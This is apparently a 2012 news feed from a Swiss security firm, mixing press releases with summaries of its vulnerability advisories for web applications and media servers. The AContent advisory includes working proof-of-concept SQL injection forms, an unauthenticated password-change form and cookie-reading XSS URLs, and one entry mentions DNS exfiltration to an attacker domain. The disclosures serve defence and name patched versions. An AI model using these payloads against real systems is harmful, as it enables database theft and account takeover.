High-Tech Bridge to Partner with Open Security Foundation

High-Tech Bridge is pleased to announce its partnership with the Open Security Foundation (OSF) and Open Security Vulnerability Database (OSVDB) in particular.

Ilia Kolochenko, CEO of High-Tech Bridge, says, "At High-Tech Bridge, we are pleased to welcome the founders of OSF, Jake Kouns and Brian Martin to our Advisory Board. Their unique experience and competence in vulnerability research and management will be extremely useful in advising our company. Strong technical collaboration between High-Tech Bridge Research Lab, which has obtained both CVE and CWE Compatible statuses this year, and OSVDB shall be fruitful for both the information security and vulnerability research communities. In the near future we are also planning to collaborate in the domain of vulnerability research leveraging our new SaaS ImmuniWeb®, to be launched on the 15^th of January 2013 in a Beta mode."

Brian Martin, President and COO of Open Security Foundation, adds, "High-Tech Bridge has shown serious dedication to providing pro bono vulnerability research for hundreds of software vendors, as well as constantly enhancing their vulnerability research and disclosure process. This drive for maintaining high standards is exactly what the OSF looks for in the industry."

About High-Tech Bridge

High-Tech Bridge SA provides companies and international organizations with cutting-edge information security services, such as penetration testing and computer crime investigations. High-Tech Bridge was recognized as one of the market leaders and best service providers in the ethical hacking industry according to Frost & Sullivan's market research conducted in 2012.

About Open Security Foundation

Open Security Foundation (OSF) is a 501(c)(3) non-profit public organization founded and operated by information security enthusiasts. Open Security Foundation provides independent, accurate, detailed, current, and unbiased security information. Open Security Foundation runs the Open Source Vulnerability Database (OSVDB), the DataLossDB, and other projects. OSVDB currently covers over 87,000 vulnerabilities, spanning over 59,000 products.

Contact
Mr. Sebastien Flaccavento
Tel.: +41-22-560-68-43
E-Mail: press (at) htbridge.com

HTB23133: Elite Bulletin Board multiple SQL injection vulnerabilities

High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in Elite Bulletin Board 2.1.21.

The vulnerabilities exist due to insufficient sanitation of user-supplied data in URI in the "update_whosonline_reg()" and "update_whosonline_guest()" functions within the "/includes/user_function.php" script. Many scripts are vulnerable to this atack. More information: High-Tech Bridge Advisory HTB23133 - Multiple SQL Injection Vulnerabilities in Elite Bulletin Board.

Upgrade to Elite Bulletin Board v2.1.22 to fix this issues.

HTB23129: FireFly Media Server Multiple Remote DoS Vulnerabilities

Multiple security vulnerabilities (HTB23126) were found in FireFly Media Server version 1.0.0.1359.

Multiple NULL pointer dereference vulnerabilities in FireFly Media Server

The vulnerability exists due to improper handling of the HTTP CONNECTION, header within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port (FireFly's server default port) with improper CONNECTION header value, leading to a NULL pointer dereference that will cause vulnerable server to crash immediately.

The vulnerability exists due to improper handling of the ACCEPT-LANGUAGE, USER-AGENT and HOST HTTP header parameters within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to port 9999/TCP with a malformed header containing a control character of return carriage ("\r\n") that will cause a NULL pointer dereference and immediate termination of the vulnerable server.

The vulnerability exists due to improper handling of the HTTP POST and GET methods within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port with an improper HTTP POST or GET request containing an erroneous HTTP protocol version, or one or more control characters of return carriage ("\r\n") leading to a NULL pointer dereference that will cause the vulnerable server to crash immediately.

Source: High-Tech Bridge Advisory HTB23129 - FireFly Media Server Multiple Remote DoS vulnerabilities.

HTB23118: Banana Dance multiple vulnerabilities

Banana Dance versions B.2.6 and probably prior suffers from PHP File Inclusion, Improper Access Control, SQL Injection vulnerabilities, according to High-Tech Bridge Advisory HTB23118 - Multiple vulnerabilities in Banana Dance.

• PHP File Inclusion in Banana Dance:
  Input passed via the "name" POST parameter to "/functions/ajax.php" is not properly verified before being used in "include_once()" function and can be exploited to include arbitrary local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

• Improper Access Control in Banana Dance:
  The application does not restrict access to the "/functions/suggest.php" script to unauthenticated users. A remote attacker can read arbitrary information from database.

• SQL Injection in Banana Dance:
  Input passed via the "return", "display", "table" and "search" POST parameters to "/functions/suggest.php" script is not properly sanitised before being used in SQL query. Although the "mysql_real_escape_string()" function is called on the input it has no effect due to usage of the ` quotes in SQL query. Input passed via the "id" GET parameter to "functions/widgets.php", "category" GET parameter to "functions/print.php", "name" GET parameter to "functions/ajax.php" scripts are not properly sanitised before being used in SQL query. This vulnerabilities can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Banana Dance is a free, open source, PHP/MySQL program that takes the best of wiki software and combines it with the best of web content management systems (CMS).

In-Memory Fuzzing with Java

New Security Publication was published by Xavier Roussel, Junior Security Analyst at High-Tech Bridge: In-Memory Fuzzing with Java.

More links about Fuzzing:

• Fuzz testing [wikipedia.org]
• Fuzzing [owasp.org]

Direct link to download PDF: In-Memory Fuzzing in JAVA (1,0 MB).

In-Memory Fuzzing with Java (Publication from High-Tech Bridge) from High-Tech Bridge SA (HTBridge)

Web Applications Vulnerabilities CVSSv2 Calculator

High-Tech Bridge is pleased to announce CVSSv2 Calculator for vulnerabilities in web applications.

The Common Vulnerability Scoring System (CVSS) provides an open framework for communicating the characteristics and impacts of IT vulnerabilities.

Read more: A Complete Guide to the Common Vulnerability Scoring System Version 2.0.

High-Tech Bridge to Announce ImmuniWeb® for its Fifth Anniversary

High-Tech Bridge is pleased to celebrate its fifth anniversary on December 12, 2012. We are grateful to all the customers for their loyalty and trust. On this remarkable date, High-Tech Bridge is also proud to partially uncover its innovative in-house product named ImmuniWeb®, expected by many customers, partners and journalists for almost one year.

Ilia Kolochenko, CEO, briefs about it:

"Our fifth year of continuous growth proves that we are doing the right thing and our business strategy is correct. Finally, we are ready to launch ImmuniWeb®, a product that is aimed to change our market towards simplicity, integrity and accessibility for Small and Medium Businesses, who were unfairly prevented from testing their security by high market prices and administrative difficulties. We have invested several million dollars and almost 3 years into its development, and now we are ready to present it to the public. The official sales of ImmuniWeb® Beta will start on the 15^th of January 2013 for all the customers in Switzerland, and for the holders of invite-codes abroad. Later the product will be available worldwide without limitations. We have already registered the trademark in 36 countries. For the moment that's all I can say about ImmuniWeb®, more information is coming soon. Stay with us."

High-Tech Bridge will offer special discounts for ImmuniWeb® to all its customers. If you are located abroad please contact your High-Tech Bridge's Account Manager by e-mail to get an invite-code.

About High-Tech Bridge
High-Tech Bridge SA provides multinational companies, financial institutions, and international organizations with edge-cutting information security, penetration testing and ethical hacking services. In 2012 Frost & Sullivan's market research has recognized High-Tech Bridge as one of the market leaders and best service providers in the ethical hacking.

Contacts
Mr. Sebastien Flaccavento
Tel.: +41-22-560-68-43
E-Mail: press@htbridge.com

Web: https://www.htbridge.com

Twitter: https://twitter.com/htbridge

Facebook: https://www.facebook.com/htbridge

HTB23127: Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)

Smartphone Pentest Framework (SPF) versions 0.1.3, 0.1.4 suffers from OS Command Injection [CWE-78]. High-Tech Bridge Security Research Lab discovered multiple vulnerabilities (Multiple OS Command Execution Vulnerabilities) in Smartphone Pentest Framework (SPF), which could be exploited to get control over a penetration testers's machine remotely.

According to High-Tech Bridge's Advisory HTB23127, multiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the "system()" function, so that it becomes possible to inject and execute arbitrary OS commands on the target system with privileges of the web server user.

Due to unfixed CSRF vulnerability (3) in HTB23123 is possible exploit the vulnerabilities, exists in "SEAttack.pl" script (due to insufficient validation of user-supplied input passed via the "hostingPath" parameter), "CSAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath", "attachMobileModem.pl" script due to insufficient validation of user-supplied input passed via the "appURLPath".

This vulnerabilities are unpatched at this time, as a temporary solution remove or disable SPF's GUI.

Full advisory: High-Tech Bridge Advisory HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).

HTB23120: TVMOBiLi Media Server remote DoS vulnerabilities

High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

Due to improper handling of length parameter inconsistency [CWE-130] TVMOBiLi was vulnerable to perform DoS attacks.

Brief description of vulnerabilities:
The vulnerabilities exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long, or 255, 257 or 260 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.

TVMOBiLi is a free Media server for Mac, Windows, and Linux OS that enables your computer to communicate with a myriad of modern devices in your home using the power of UPnP.

Solution:
Vulnerabilities are now fixed in TVMOBiLi 2.1.0.3974

References:

1. High-Tech Bridge Advisory HTB23120: TvMobili Media Server Multiple Remote DoS Vulnerabilities
2. TVMOBiLi - a free Media server for Mac, Windows, and Linux

HTB23125: ClipBucket SQL injection vulnerabilities

Multiple SQL injection vulnerabilities were found in ClipBucket, free and opensource video sharing script. Full details of vulnerabilities with Proof-of-Concept examples are available on High-Tech Bridge Security Research Lab's page: High-Tech Bridge Advisory HTB23125: Multiple SQL Injection vulnerabilities in ClipBucket.

Vulnerable scripts list: "ajax.php", "/user_contacts.php", "/view_channel.php", "view_page.php", "view_topic.php", "/watch_video.php".

As noticed on researcher's page, some of this vulnerabilities were described early for previous versions of ClipBucket, however they were not fixed in the tested version (2.6 Revision 738).

Now solution is available: apply CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2). This files are available in download area of ClipBucket's SourceForge page.

HTB23126: Achievo SQL injection, cross-site scripting (XSS) vulnerabilities

Multiple security vulnerabilities (HTB23126) are found in Achievo version 1.4.5.

• SQL Injection vulnerability in Achievo:
  The vulnerability was discovered in the "dispatch.php" script while handling the "activityid" HTTP GET parameter. A remote authenticated attacker can inject and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability requires that an attacker is logged-in into application (registration is closed by default).
• Cross-Site Scripting (XSS) vulnerability in Achievo:
  Input sanitation error was found in the "include.php" script when handling the "field" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in user's browser in context of a vulnerable website.

Achievo is flexible web-based resource management software that is suitable for any medium sized company that needs to keep track of its resources, projects, clients, contacts, planning and daily scheduling.

References:

1. Achievo.org - Project Management Software
2. High-Tech Bridge Advisory HTB23126: Multiple vulnerabilities in Achievo

More photos of High-Tech Bridge's office: our racks

In continuation of previous post High-Tech Bridge office photos became available more pictures.

All other photos and events you can see here: High-Tech Bridge on Facebook.

Online Trust Alliance (OTA) Gold Sponsor

Not so long ago, High-Tech Bridge has joined to the Online Trust Alliance (OTA) as a Gold Sponsor and Advisory Council member. Also, like High-Tech Bridge, the list includes organizations like AllClear ID, Epsilon, Internet Identity, LashBack, Microsoft, Pitney Bowes, PricewaterhouseCoopers, Secunia, Verisign.
The whole list: OTA Gold Sponsors - Advisory Council.

HTB23123: Smartphone Pentest Framework (SPF) multiple vulnerabilities

Smartphone Pentest Framework (SPF) version 0.1.2 suffers from 5 different types of software weaknesses: OS Command Injection [CWE-78], SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352], Improper Access Control [CWE-284], Incorrect Default Permissions [CWE-276]. High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine.

• Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF):
  Multiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the system() function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server.

• SQL Injection [CWE-89]:
  Multiple Perl scripts in the "/frameworkgui/" directory are vulnerable to SQL injections. A remote attacker can execute arbitrary SQL commands in application's database.

• Cross-Site Request Forgery [CWE-352]:
  The vulnerability exists due to insufficient verification of the HTTP requests origin in all Perl scripts within the "/frameworkgui/" directory. A remote attacker without direct access to application's web interface can perform cross-site request forgery attacks and execute arbitrary actions available to application's users only (e.g. send SMS messages).

• Improper Access Control [CWE-284]:
  The weakness exists due to insufficient ACL to the "config" file located in "/frameworkgui/" directory. A remote attacker can access the configuration file directly and obtain sensitive information, such as database password that is stored in plaintext.

• Incorrect Default Permissions [CWE-276]:
  The weakness exists because of "btinstall" installation script that sets world-writable permissions for all files within the "/frameworkgui/" directory:
  cd /var/www/frameworkgui; chmod 777 * ;

Solution available:
Upgrade to Smartphone Pentest Framework (SPF) version 0.1.3.

Original HTB Advisory:
HTB23123: Multiple Vulnerabilities in Smartphone Pentest Framework (SPF)

HTB23124: dotProject multiple vulnerabilities

dotProject 2.1.6, an open source web-based project management application, suffers from SQL injection, cross-site scripting (XSS) vulnerabilities. Vulnerabilities were discovered by the researcher High-Tech Bridge Security Research Lab.

• SQL Injection in dotProject:
  Vulnerability exists due to insufficient sanitation of input passed via the "search_string", "where", "dept_id", "project_id", "company_id HTTP GET parameters to the "index.php" script. These vulnerabilities could also be exploited by a remote non-authenticated attacker via CSRF vector.

• Cross-Site Scripting (XSS) in dotProject:
  Input sanitation errors was found in the "index.php" script when handling the "callback", "field", "company_name", "date" HTTP GET parameters.

Vulnerabilities risk level have medium severity.

Solution: Upgrade your dotProject installation to version 2.1.7.

Original advisory: HTB23124: Multiple vulnerabilities in dotProject.

HTB23122: BabyGekko multiple vulnerabilities

BabyGekko CMS v.1.2.2e suffers from SQL injection, PHP file inclusion, cross-site scripting vulnerabilities.

• SQL Injections in Baby Gekko:
  The vulnerability exists due to insufficient validation of input passed via the "keyword" and "query" parameters to "admin/index.php" script. In first case the "app" parameter must be set to "users". This vulnerabilities can be exploited by a non-authenticated malicious user via CSRF vector.

• Local File Inclusion
  The vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php" script. A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte.

• Cross-site scripting (XSS)
  Input passed via the "id" parameter to "/admin/index.php"; via the "username" and "password" HTTP POST parameters to the "index.php" are not properly sanitized. This can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

This vulnerabilities are fixed in BabyGekko 1.2.2f.

More information about this issues with PoC's and attack scenario you can found on this page: High-Tech Bridge Advisory HTB23122 - Multiple vulnerabilities in BabyGekko.

Photos from Gartner Symposium ITexpo 2012 in Barcelona

Some photos from Gartner Symposium ITexpo 2012, taked place in Barcelona, shared on Facebook by High-Tech Bridge.

High-Tech Bridge Continues Expansion and Prepares Innovative Product Announcement Shortly

High-Tech Bridge is pleased to announce share capital increase to 4M CHF. New funding will be mainly used to finish an innovative in-house security product development, announcement of which will be done in the near future. For the moment the product is passing pre-final internal testing phase.

Ilia Kolochenko, CEO, summarizes the corporate course of 2012: "At High-Tech Bridge, 2012 was a year of several significant achievements. First of all, our organic growth, stable development and permanent internal perfection processes were recognized by Frost & Sullivan, who nominated High-Tech Bridge as one of the market leaders and best service providers in the ethical hacking industry in April.

Secondly, in June High-Tech Bridge has been named to the Online Trust Alliance (OTA) 2012 Online Trust Honor Roll. Designed to recognize leadership, the Honor Roll distinguishes High-Tech Bridge as a "North Star" to inspire others.

Thirdly, our proprietary Security Research Lab has successfully obtained both CVE® and CWE® compatibility status that assures the highest quality of our research. We were investing and we will continue investing into Research and Development, as we consider innovation as one of the most important factors to assure the best quality of service for our customers.

We also managed to reinforce considerably our technical team with new experts. Therefore in August we doubled our office space and we expect to increase it even more before the end of the year, staying at World Trade Center Geneva. In October we have successfully passed our yearly ISO 27001 audit by SGS.

High-Tech Bridge's main priority is customer satisfaction. We thank all our customers for loyalty and trust, and we will do our best to continue delivering cutting-edge ethical hacking and computer forensics services in the future. Our new product, that is currently being tested, is also aimed to deliver the highest level of satisfaction to the customers of its niche."

We remind that during this week High-Tech Bridge's team will be pleased to meet you at Gartner's Symposium ITxpo 2012 in Barcelona, where High-Tech Bridge is a speaker and exhibitor. We also look forward seeing you at ISACA's "Information Security Day" in February 2013 taking place in Luxembourg, where High-Tech Bridge is a Gold Sponsor and speaker for two security talks.

Contact
Sebastien Flaccavento
Senior Project Manager

High-Tech Bridge SA
Public and Press Relations
+41-22-560-68-43
E-mail: press (at) htbridge.com
https://www.htbridge.com

Source: High-Tech Bridge continues expansion and prepares innovative product announcement shortly.

HTB23121: CMS Made Simple cross-site request forgery (CSRF) vulnerability

CMS Made Simple (version 1.11.2), an open source CMS, contain vulnerability which can be exploited to perform cross-site request forgery (CSRF) attacks.

The application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to delete arbitrary files and directories. An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.

PoC (Proof of Concept) code for this advisory will delete the root directory with all files leading to complete destroy of the CMS (when additional conditions satisfied).

Vulnerability is fixed at this moment, upgrade to CMSMS 1.11.2.1

High-Tech Bridge Advisory HTB23121 - Сross-Site Request Forgery (CSRF) in CMS Made Simple.

HTB23119: SQL Injection vulnerabilities in OrangeHRM

OrangeHRM version 2.7.1-rc.1 and probably prior contain SQL Injection [CWE-89] vulnerabilities. This vulnerabilities is reported by High-Tech Bridge Security Research Lab.

Vulnerabilities was discovered in the "symfony/web/index.php" script while handling the "sortField" HTTP GET parameter. Successful exploitation of this vulnerability requires administrative privileges, however it can be exploited by a non-authenticated user via CSRF vector, as the above-mentioned script is also vulnerable to CSRF attack. The vulnerability could be triggered by accessing the following URIs:
/symfony/web/index.php/admin/viewCustomers
/symfony/web/index.php/admin/viewPayGrades
/symfony/web/index.php/admin/viewPayGrades


The PoC in advisory are based on DNS Exfiltration technique and can be used in cases when application's database is hosted on a Windows system. The PoCs will send a DNS request demanding IP addess for `version()` (or any other sensitive information from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker).

All details, Proof of Concept (PoC) examples available in page below:
High-Tech Bridge Advisory HTB23119 - SQL Injection Vulnerability in Orange HRM.

HTB23106: Multiple DoS vulnerabilities in LibreOffice

LibreOffice Suite version 3.5.5.3 is vulnerable to Denial of Service (DoS) vulnerabilities.

Advisory ID: HTB23106
Product: LibreOffice Suite
Vendor: LibreOffice
Tested / Vulnerable Versions: 3.5.5.3 / 3.5.5.3 and probably prior
Vendor Notification / Patch / Public Disclosure dates: July 26 / October 18 / October 31, 2012
Vulnerability Type: NULL Pointer Dereference [CWE-476]
CVE Reference: CVE-2012-4233
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
Solution Status: Fixed by Vendor
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab

Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in LibreOffice which could be exploited to perform denial of service (DoS) attacks.

Multiple vulnerabilities in LibreOffice:

1. NULL pointer dereference error was found in the vcllo.dll while processing .odt files. A remote attacker can create a specially crafted .odt file, trick a user into opening that file and terminate the application.

2. Null pointer dereference error was found in svxcorelo.dll while processing the ODG (Drawing document) files. A remote attacker can create a specially crafted ODG file, trick a user into opening that file and terminate the application.

3. Null pointer dereference error was found in tllo.dll when handling the PolyPolygon record within embedded .wmf file in the Microsoft PowerPoint 2003 (PPT) files. A remote attacker can create a specially crafted .ppt file, trick a user into opening that file and terminate the application.

4. Null pointer dereference error was found in scfiltlo.dll while processing the Microsoft Excel 2003 (XLS) files. A remote attacker can create a specially crafted XLS file, trick a user into opening that file and terminate the application.

Proof of Concept (PoC) examples available in original advisory. See the link below.

Attack vectors

These vulnerabilities require that user opens a specially crafted file with an affected version of LibreOffice Suite software. An attacker could use several ways to deliver malicious file to the system.

In a web-based scenario, an attacker could host a file on a website or WebDav share and trick a user into downloading and opening this file.

In an email scenario, an attacker could exploit this vulnerability by sending an email with attached malicious file.

Solution:

Upgrade to LibreOffice 3.5.7.2
More Information:
http://www.libreoffice.org/advisories/cve-2012-4233/

Source advisory: High-Tech Bridge Advisory HTB23106 - Denial of Service Vulnerability in LibreOffice. It contains all technical details and description of vulnerabilities.

ISACA's Information Security Day: High-Tech Bridge as Gold Sponsor and Speaker

High-Tech Bridge, Information Security Company, is Gold Sponsor and Speaker on "Information Security Day" organized by ISACA®. Conferences to hold:

• Manipulating Memory for Fun and Profit

The event will take place on the 6-7 of February 2013 in Luxembourg.

HTB23117: AContent multiple vulnerabilities

Multiple security vulnerabilities discovered by High-Tech Bridge Security Research Lab in AContent version 1.2.

Advisory ID: HTB23117
Product: AContent
Vendor: ATutor
Vulnerable Version(s): 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: September 26, 2012 
Public Disclosure: October 17, 2012 
Vulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) SQL Injection in AContent: CVE-2012-5167

1.1 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.3 Input passed via the "id" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">
<input type="hidden" name="submit" value="1" />
<input type="submit" id="btn">
</form>

Successful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.

2) Improper Authentication in AContent: CVE-2012-5168

2.1 The vulnerability exists due to absent authentication in the "/user/index_inline_editor_submit.php" script. A remote unauthorized attacker can change users' passwords.

The following example will change password for user with id=1 to 'password'.

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password-1" />
<input type="hidden" name="value" value="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" />
<input type="submit" id="btn">
</form>

2.2 The vulnerability exists due to absent authentication in the "/course_category/index_inline_editor_submit.php" script. A remote unauthorized attacker can modify names for existing categories.

The following example will change category name with id=1 to 'new_category':

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1" />
<input type="hidden" name="value" value="new_category" />
<input type="submit" id="btn">
</form>

3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169

Input passed via the HTTP GET parameters "pathext", "popup", "framed", and "file" to /file_manager/preview_top.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.

The following PoCs (Proof of Concept) demonstrate the vulnerabilities:

http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Eale
rt%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert
%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealer
t%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%
28document.cookie%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

Users should apply patches #1 and #2 using the AContent Administrator's Updater tool

More Information:
http://update.atutor.ca/acontent/patch/1_2/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.
[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23113: Subrion CMS multiple vulnerabilities

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS version 2.2.1 which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and Сross-Site Request Forgery (CSRF) attacks.

• SQL Injection in Subrion CMS:
  Input passed via the "plan_id" POST parameter to "/register/" URL (modified by mod_rewrite to "system.php" script) is not properly sanitised before being used in SQL query.

• Cross-Site Scripting (XSS) in Subrion CMS:
  Input passed via the "f[accounts][fullname]" and "f[accounts][username]" GET parameters to "/advsearch/" URL (modified by mod_rewrite to "system.php" script), via the "id" and "group" GET parameters to multiple files is not properly sanitised before being returned to the user.

• Сross-Site Request Forgery (CSRF) in Subrion CMS:
  It is possible to create administrative account within application.

Proof of concept (Poc) examples available on original advisory page: HTB23113 - Multiple vulnerabilities in Subrion CMS.

HTB23107: jCore multiple vulnerabilities

jCore, a free and open source content management system (CMS), version 1.0pre, suffers from SQL Injection, XSS vulnerabilities.

Vulnerabilities was discovered by High-Tech Bridge Security Research Lab, and published on advisory page:

High-Tech Bridge Advisory HTB23107 - Multiple vulnerabilities in jCore.

SQL injection: input passed via the "memberloginid" COOKIE parameter to "admin/index.php" is not properly sanitised before being used in SQL query.

XSS: input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.

Solution: upgrade to the last release.

HTB23099: Samsung Kies multiple vulnerabilities

Multiple vulnerabilities in Samsung Kies version 2.3.2.12054_20 and probably prior have been discovered by High-Tech Bridge Security Research Lab, that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user. Vulnerabilities types in HTB23099: NULL pointer dereference, improper access control vulnerabilities

• Null Pointer Dereference in Samsung Kies:
  The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control.

• Arbitrary File Execution in Samsung Kies:
  The CmdAgent.dll library has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

• Arbitrary Directory Modification in Samsung Kies:
  The CmdAgent.dll library, has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

• Arbitrary Registry Modification in Samsung Kies:
  The CmdAgent.dll library, has numerous Registry modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

PoC-examples, additional details and how-to-fix information available on researcher's page.

Video: The Growing Hacking Threat to Websites: An Ongoing Commitment to Web Application Security

Watch "The Growing Hacking Threat to Websites: An Ongoing Commitment to Web Application Security" video on Youtube:

Links:

• htbridge.com/websecurity
• Video on YouTube
• Publication on our blog

CVE-2012-1535: Adobe Flash Player integer overflow vulnerability analysis

Brian Mariani and Frederic Bourla from High-Tech Bridge has published whitepaper "CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis". Publication explains the particulars of the CVE-2012-1535 security vulnerability in details.

You can download PDF here: CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis.

HTB23116: OpenX cross-site scripting & SQL injection vulnerabilities

Multiple vulnerabilities in OpenX have been discovered by High-Tech Bridge Security Research Lab 3 week ago and disclosed this week.

• Cross-Site Scripting (XSS) in OpenX: Input passed via the "parent" GET parameter to "www/admin/plugin-index.php" is not properly sanitised before being returned to the user.

• SQL Injection in OpenX: Input passed via the "ids[]" POST parameter to "www/admin/campaign-zone-link.php" is not properly sanitised before being used in SQL query.

To fix this issues replace files from SVN repository as mentioned in High-Tech Bridge security advisory HTB23116: Multiple vulnerabilities in OpenX. PoC examples also available on researcher's page.

How to Secure Your Digital Assets in the Era of Cyber War (October, 16)

High-Tech Bridge Annual Conference

Date:	16 October 2012
Venue:	Crowne Plaza Hotel, Geneva, Switzerland

Businesses of all sizes are embracing new approaches to IT (such as cloud computing, virtualisation, BYOD and BPO), making them more and more dependent upon their IT infrastructure. This dynamic IT environment stimulates hackers, and organisations face increasingly targeted and sophisticated attacks. The attackers range from individual "hacktivists" to organised crime rings and totalitarian nation-states. Many hackers are highly organised and skilled.

Despite the prevalence of firewalls, IDS/IPS, encryption and other security measures, many organisations continue to fall victim to hacking attacks due to configuration errors or inadequate security solutions. As a result, companies are beginning to recognise the importance of regular security audits, because human experience and analysis are essential to the maintenance of a strong network security perimeter.

